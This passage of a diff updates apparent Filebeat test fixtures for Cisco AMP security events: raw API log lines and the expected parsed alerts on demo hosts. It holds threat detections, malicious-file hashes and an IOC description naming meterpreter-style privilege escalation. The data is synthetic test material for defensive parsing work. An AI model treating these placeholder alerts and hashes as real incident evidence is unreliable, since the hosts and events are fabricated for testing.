Detected","event_type_id":1107296279,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Low","start_timestamp":1608872547,"start_date":"2020-12-25T05:02:27+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Clean","file_name":"mshtml.dll","identity":{"sha256":"d1bea74ac9d85b3dcd4abc1af42af6c37b9349defc8e6577993611b773f56ca0"},"parent":{"disposition":"Clean","identity":{"sha256":"93b2ed4004ed5f7f3039dd7ecbd22c7e4e24b6373b4d9ef8d6e45a179b13a5e8"}}},"vulnerabilities":[{"name":"Microsoft Internet 
Explorer","version":"11","cve":"CVE-2018-0762","score":"7.6","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0762"},{"cve":"CVE-2018-0772","score":"7.6","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0772"}]}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":15193384371995,"timestamp":1608872546,"timestamp_nanoseconds":0,"date":"2020-12-25T05:02:26+00:00","event_type":"Vulnerable Application Detected","event_type_id":1107296279,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Low","start_timestamp":1608872546,"start_date":"2020-12-25T05:02:26+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Clean","file_name":"mshtml.dll","identity":{"sha256":"1dc5d15a26a79bb46519952a60b15aa4acb36f6ce3247ebf50df9c157bc4fcf4"},"parent":{"disposition":"Clean","identity":{"sha256":"93b2ed4004ed5f7f3039dd7ecbd22c7e4e24b6373b4d9ef8d6e45a179b13a5e8"}}},"vulnerabilities":[{"name":"Microsoft Internet Explorer","version":"11","cve":"CVE-2018-0762","score":"7.6","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0762"},{"cve":"CVE-2018-0772","score":"7.6","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0772"}]}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":15193366641599,"timestamp":1608870773,"timestamp_nanoseconds":0,"date":"2020-12-25T04:32:53+00:00","event_type":"Vulnerable Application Detected","event_type_id":1107296279,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Low","start_timestamp":1608870773,"start_date":"2020-12-25T04:32:53+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Clean","file_name":"OUTLOOK.EXE","identity":{"sha256":"465f398ae8e3c32395eb7c04bc8cd24595068e6a127e243bed3e9b4931556bfc"},"parent":{"disposition":"Clean","identity":{"sha256":"71854d2c40664493e05c0a7e4f0c7cc74ada1a63eec1d4fe32350f6af8728243"}}},"vulnerabilities":[{"name":"Microsoft 
Office","version":"2016","cve":"CVE-2017-0106","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0106"},{"cve":"CVE-2017-11774","score":"6.8","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11774"},{"cve":"CVE-2017-8506","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8506"},{"cve":"CVE-2017-8507","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8507"},{"cve":"CVE-2017-8571","score":"6.8","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8571"},{"cve":"CVE-2017-8663","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8663"},{"cve":"CVE-2018-0791","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0791"}]}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6525498672153625000,"timestamp":1608870165,"timestamp_nanoseconds":878000000,"date":"2020-12-25T04:22:45+00:00","event_type":"Policy Update","event_type_id":553648130,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6525494703603843000,"timestamp":1608869241,"timestamp_nanoseconds":928000000,"date":"2020-12-25T04:07:21+00:00","event_type":"Scan Completed, No Detections","event_type_id":554696715,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"scan":{"description":"Flash Scan","clean":true,"scanned_files":2872,"scanned_processes":49,"scanned_paths":0,"malicious_detections":0}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6525494527510184000,"timestamp":1608869200,"timestamp_nanoseconds":537000000,"date":"2020-12-25T04:06:40+00:00","event_type":"Scan 
Started","event_type_id":554696714,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"scan":{"description":"Flash Scan"}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":114000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163569","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} \ No newline at end of file 
diff --git a/x-pack/filebeat/module/cisco/amp/test/cisco_amp2.ndjson.log-expected.json b/x-pack/filebeat/module/cisco/amp/test/cisco_amp2.ndjson.log-expected.json
index 7cd87985c4a..c26ba6d9286 100644
--- a/x-pack/filebeat/module/cisco/amp/test/cisco_amp2.ndjson.log-expected.json
+++ b/x-pack/filebeat/module/cisco/amp/test/cisco_amp2.ndjson.log-expected.json
@@ -420,119 +420,63 @@ ] }, { - "@timestamp": "2021-01-15T10:32:58.000Z", - "cisco.amp.cloud_ioc.description": "A named pipe was created in a manner similar to that used for local privilege escalation through named pipe impersonation. Tools such as meterpreter often use this technique to escalate to NT Authority\\System.", - "cisco.amp.cloud_ioc.short_description": "W32.PossibleNamedPipeImpersonation.ioc", + "@timestamp": "2021-01-15T10:37:43.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", - "mac": "27:85:29:21:67:49" + "mac": "e1:e5:94:ea:a5:44" } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.event_type_id": 1107296274, - "cisco.amp.file.disposition": "Clean", - "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.detection": "DFC.CustomIPList", + "cisco.amp.detection_id": "6180341055704006657", + "cisco.amp.event_type_id": 1090519084, "cisco.amp.group_guids": [ "test_group_guid" ], + "cisco.amp.network_info.nfm.direction": "Outgoing connection from", + "cisco.amp.network_info.parent.disposition": "Clean", "cisco.amp.related.mac": [ - "27:85:29:21:67:49" - ], - "cisco.amp.timestamp_nanoseconds": 322000000, - "event.action": "Cloud IOC", - "event.category": [ - "file" + "e1:e5:94:ea:a5:44" ], + "cisco.amp.timestamp_nanoseconds": 978000000, + "destination.as.number": 15169, + "destination.as.organization.name": "Google LLC", + "destination.geo.continent_name": "North America", + "destination.geo.country_iso_code": "US", + "destination.geo.country_name": "United States", + "destination.geo.location.lat": 37.751, + "destination.geo.location.lon": -97.822, + "destination.ip": "8.8.4.4", + "destination.port": 443, + "event.action": "DFC Threat Detected", "event.dataset": "cisco.amp", - "event.id": 1476910664322001000, + "event.id": 6180341055704007000, "event.kind": "alert", 
"event.module": "cisco", "event.severity": 3, - "event.start": "2021-01-15T10:32:58.000Z", - "file.hash.sha256": "935c1861df1f4018d698e8b65abfa02d7e9037d8f68ca3c2065b6ca165d44ad2", - "file.name": "cmd.exe", - "file.path": "/C:/WINDOWS/system32/cmd.exe", - "fileset.name": "amp", - "host.hostname": "Demo_Command_Line_Arguments_Meterpreter", - "host.name": "Demo_Command_Line_Arguments_Meterpreter", - "input.type": "log", - "log.offset": 25799, - "process.hash.sha256": "69d6fff3e0a0c4d77a62b4d71e1e3a8d10d93c46782a1b05f0ec4b8919c384b9", - "related.hash": [ - "935c1861df1f4018d698e8b65abfa02d7e9037d8f68ca3c2065b6ca165d44ad2" - ], - "related.hosts": [ - "Demo_Command_Line_Arguments_Meterpreter" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:27:39.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "63:5f:47:2b:89:91" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "W32.File.MalParent", - "cisco.amp.detection_id": "6533671385032556606", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "63:5f:47:2b:89:91" - ], - "cisco.amp.timestamp_nanoseconds": 25000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 6533671385032557000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", - "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", - "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "file.name": "ekjrngjker.exe", - 
"file.path": "\\\\?\\C:\\ekjrngjker.exe", "fileset.name": "amp", - "host.hostname": "Demo_AMP_Threat_Audit", - "host.name": "Demo_AMP_Threat_Audit", - "host.os.family": "windows", - "host.os.platform": "windows", + "host.hostname": "Demo_Upatre", + "host.name": "Demo_Upatre", "host.user.name": "user@testdomain.com", "input.type": "log", - "log.offset": 27431, - "related.hash": [ - "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "b99e0a8c56f963246b6464b9fffbf7a2", - "b024546a49bad1bd60fccef0a5d11b55f9a442c4" - ], + "log.offset": 18534, + "network.direction": "egress", + "network.transport": "TCP", + "process.hash.md5": "b3581f426dc500a51091cdd5bacf0454", + "process.hash.sha1": "8de30174cebc8732f1ba961e7d93fe5549495a80", + "process.hash.sha256": "b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132", + "process.name": "iexplore.exe", + "process.pid": 3136, "related.hosts": [ - "Demo_AMP_Threat_Audit" + "Demo_Upatre" ], "related.ip": [ + "10.10.0.0", + "8.8.4.4", "8.8.8.8", "10.10.10.10" ], 
@@ -540,64 +484,71 @@ "user@testdomain.com" ], "service.type": "cisco", + "source.ip": "10.10.0.0", + "source.port": 55805, "tags": [ "cisco-amp", "forwarded" ] }, { - "@timestamp": "2021-01-15T10:27:38.000Z", + "@timestamp": "2021-01-15T10:37:43.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", - "mac": "63:5f:47:2b:89:91" + "mac": "e1:e5:94:ea:a5:44" } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "W32.File.MalParent", - "cisco.amp.detection_id": "6533671380737589308", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", + "cisco.amp.detection": "DFC.CustomIPList", + "cisco.amp.detection_id": "6180341055704006661", + "cisco.amp.event_type_id": 1090519084, "cisco.amp.group_guids": [ "test_group_guid" ], + "cisco.amp.network_info.nfm.direction": "Outgoing connection from", + "cisco.amp.network_info.parent.disposition": "Clean", "cisco.amp.related.mac": [ - "63:5f:47:2b:89:91" - ], - "cisco.amp.timestamp_nanoseconds": 605000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" + "e1:e5:94:ea:a5:44" ], + "cisco.amp.timestamp_nanoseconds": 947000000, + "destination.as.number": 15169, + "destination.as.organization.name": "Google LLC", + "destination.geo.continent_name": "North America", + "destination.geo.country_iso_code": "US", + "destination.geo.country_name": "United States", + "destination.geo.location.lat": 37.751, + "destination.geo.location.lon": -97.822, + "destination.ip": "8.8.4.4", + "destination.port": 443, + "event.action": "DFC Threat Detected", "event.dataset": "cisco.amp", - "event.id": 6533671380737589000, + "event.id": 6180341055704007000, "event.kind": "alert", "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", - "file.hash.sha1": 
"b024546a49bad1bd60fccef0a5d11b55f9a442c4", - "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "file.name": "ekjrngjker.exe", - "file.path": "C:\\ekjrngjker.exe", + "event.severity": 3, "fileset.name": "amp", - "host.hostname": "Demo_AMP_Threat_Audit", - "host.name": "Demo_AMP_Threat_Audit", + "host.hostname": "Demo_Upatre", + "host.name": "Demo_Upatre", "host.user.name": "user@testdomain.com", "input.type": "log", - "log.offset": 30074, - "related.hash": [ - "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "b99e0a8c56f963246b6464b9fffbf7a2", - "b024546a49bad1bd60fccef0a5d11b55f9a442c4" - ], + "log.offset": 19987, + "network.direction": "egress", + "network.transport": "TCP", + "process.hash.md5": "b3581f426dc500a51091cdd5bacf0454", + "process.hash.sha1": "8de30174cebc8732f1ba961e7d93fe5549495a80", + "process.hash.sha256": "b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132", + "process.name": "iexplore.exe", + "process.pid": 3136, "related.hosts": [ - "Demo_AMP_Threat_Audit" + "Demo_Upatre" ], "related.ip": [ + "10.10.0.0", + "8.8.4.4", "8.8.8.8", "10.10.10.10" ], 
@@ -605,66 +556,71 @@ "user@testdomain.com" ], "service.type": "cisco", + "source.ip": "10.10.0.0", + "source.port": 55809, "tags": [ "cisco-amp", "forwarded" ] }, { - "@timestamp": "2021-01-15T10:26:38.000Z", + "@timestamp": "2021-01-15T10:37:43.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", - "mac": "63:5f:47:2b:89:91" + "mac": "e1:e5:94:ea:a5:44" } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "W32.File.MalParent", - "cisco.amp.detection_id": "6533671123039551547", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", + "cisco.amp.detection": "DFC.CustomIPList", + "cisco.amp.detection_id": "6180341055704006660", + "cisco.amp.event_type_id": 1090519084, "cisco.amp.group_guids": [ "test_group_guid" ], + "cisco.amp.network_info.nfm.direction": "Outgoing connection from", + "cisco.amp.network_info.parent.disposition": "Clean", "cisco.amp.related.mac": [ - "63:5f:47:2b:89:91" - ], - "cisco.amp.timestamp_nanoseconds": 81000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" + "e1:e5:94:ea:a5:44" ], + "cisco.amp.timestamp_nanoseconds": 931000000, + "destination.as.number": 15169, + "destination.as.organization.name": "Google LLC", + "destination.geo.continent_name": "North America", + "destination.geo.country_iso_code": "US", + "destination.geo.country_name": "United States", + "destination.geo.location.lat": 37.751, + "destination.geo.location.lon": -97.822, + "destination.ip": "8.8.4.4", + "destination.port": 443, + "event.action": "DFC Threat Detected", "event.dataset": "cisco.amp", - "event.id": 6533671123039551000, + "event.id": 6180341055704007000, "event.kind": "alert", "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", - "file.hash.sha1": 
"b024546a49bad1bd60fccef0a5d11b55f9a442c4", - "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "file.name": "ekjrngjker.exe", - "file.path": "\\\\?\\C:\\ekjrngjker.exe", + "event.severity": 3, "fileset.name": "amp", - "host.hostname": "Demo_AMP_Threat_Audit", - "host.name": "Demo_AMP_Threat_Audit", - "host.os.family": "windows", - "host.os.platform": "windows", + "host.hostname": "Demo_Upatre", + "host.name": "Demo_Upatre", "host.user.name": "user@testdomain.com", "input.type": "log", - "log.offset": 31393, - "related.hash": [ - "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "b99e0a8c56f963246b6464b9fffbf7a2", - "b024546a49bad1bd60fccef0a5d11b55f9a442c4" - ], + "log.offset": 21440, + "network.direction": "egress", + "network.transport": "TCP", + "process.hash.md5": "b3581f426dc500a51091cdd5bacf0454", + "process.hash.sha1": "8de30174cebc8732f1ba961e7d93fe5549495a80", + "process.hash.sha256": "b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132", + "process.name": "iexplore.exe", + "process.pid": 3136, "related.hosts": [ - "Demo_AMP_Threat_Audit" + "Demo_Upatre" ], "related.ip": [ + "10.10.0.0", + "8.8.4.4", "8.8.8.8", "10.10.10.10" ], 
@@ -672,3680 +628,71 @@ "user@testdomain.com" ], "service.type": "cisco", + "source.ip": "10.10.0.0", + "source.port": 55808, "tags": [ "cisco-amp", "forwarded" ] }, { - "@timestamp": "2021-01-15T10:26:37.000Z", + "@timestamp": "2021-01-15T10:37:43.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", - "mac": "63:5f:47:2b:89:91" + "mac": "e1:e5:94:ea:a5:44" } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "W32.File.MalParent", - "cisco.amp.detection_id": "6533671118744584249", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", + "cisco.amp.detection": "DFC.CustomIPList", + "cisco.amp.detection_id": "6180341055704006659", + "cisco.amp.event_type_id": 1090519084, "cisco.amp.group_guids": [ "test_group_guid" ], + "cisco.amp.network_info.nfm.direction": "Outgoing connection from", + "cisco.amp.network_info.parent.disposition": "Clean", "cisco.amp.related.mac": [ - "63:5f:47:2b:89:91" - ], - "cisco.amp.timestamp_nanoseconds": 666000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 6533671118744584000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", - "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", - "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "file.name": "ekjrngjker.exe", - "file.path": "C:\\ekjrngjker.exe", - "fileset.name": "amp", - "host.hostname": "Demo_AMP_Threat_Audit", - "host.name": "Demo_AMP_Threat_Audit", - "host.user.name": "user@testdomain.com", - "input.type": "log", - "log.offset": 34036, - "related.hash": [ - "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - 
"b99e0a8c56f963246b6464b9fffbf7a2", - "b024546a49bad1bd60fccef0a5d11b55f9a442c4" - ], - "related.hosts": [ - "Demo_AMP_Threat_Audit" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "related.user": [ - "user@testdomain.com" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:25:37.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "63:5f:47:2b:89:91" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "W32.File.MalParent", - "cisco.amp.detection_id": "6533670861046546488", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "63:5f:47:2b:89:91" - ], - "cisco.amp.timestamp_nanoseconds": 293000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 6533670861046546000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", - "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", - "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "file.name": "ekjrngjker.exe", - "file.path": "\\\\?\\C:\\ekjrngjker.exe", - "fileset.name": "amp", - "host.hostname": "Demo_AMP_Threat_Audit", - "host.name": "Demo_AMP_Threat_Audit", - "host.os.family": "windows", - "host.os.platform": "windows", - "host.user.name": "user@testdomain.com", - "input.type": "log", - "log.offset": 35355, - "related.hash": [ - "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "b99e0a8c56f963246b6464b9fffbf7a2", - "b024546a49bad1bd60fccef0a5d11b55f9a442c4" - ], - "related.hosts": [ - 
"Demo_AMP_Threat_Audit" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "related.user": [ - "user@testdomain.com" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:25:36.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "63:5f:47:2b:89:91" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "W32.File.MalParent", - "cisco.amp.detection_id": "6533670856751579190", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "63:5f:47:2b:89:91" - ], - "cisco.amp.timestamp_nanoseconds": 880000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 6533670856751579000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", - "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", - "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "file.name": "ekjrngjker.exe", - "file.path": "C:\\ekjrngjker.exe", - "fileset.name": "amp", - "host.hostname": "Demo_AMP_Threat_Audit", - "host.name": "Demo_AMP_Threat_Audit", - "host.user.name": "user@testdomain.com", - "input.type": "log", - "log.offset": 38000, - "related.hash": [ - "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "b99e0a8c56f963246b6464b9fffbf7a2", - "b024546a49bad1bd60fccef0a5d11b55f9a442c4" - ], - "related.hosts": [ - "Demo_AMP_Threat_Audit" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "related.user": [ - "user@testdomain.com" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - 
"forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:24:58.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "90:61:b5:c9:13:79" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "W32.3372C1EDAB-100.SBX.TG", - "cisco.amp.event_type_id": 1107296258, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.file.parent.disposition": "Clean", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "90:61:b5:c9:13:79" - ], - "cisco.amp.timestamp_nanoseconds": 329000000, - "event.action": "Multiple Infected Files", - "event.category": [ - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 1489955900329000200, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 3, - "event.start": "2021-01-15T10:24:58.000Z", - "file.hash.sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", - "fileset.name": "amp", - "host.hostname": "Demo_TeslaCrypt", - "host.name": "Demo_TeslaCrypt", - "input.type": "log", - "log.offset": 39319, - "process.hash.sha256": "9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad", - "related.hash": [ - "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370" - ], - "related.hosts": [ - "Demo_TeslaCrypt" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:23:01.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "63:5f:47:2b:89:91" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "W32.File.MalParent", - 
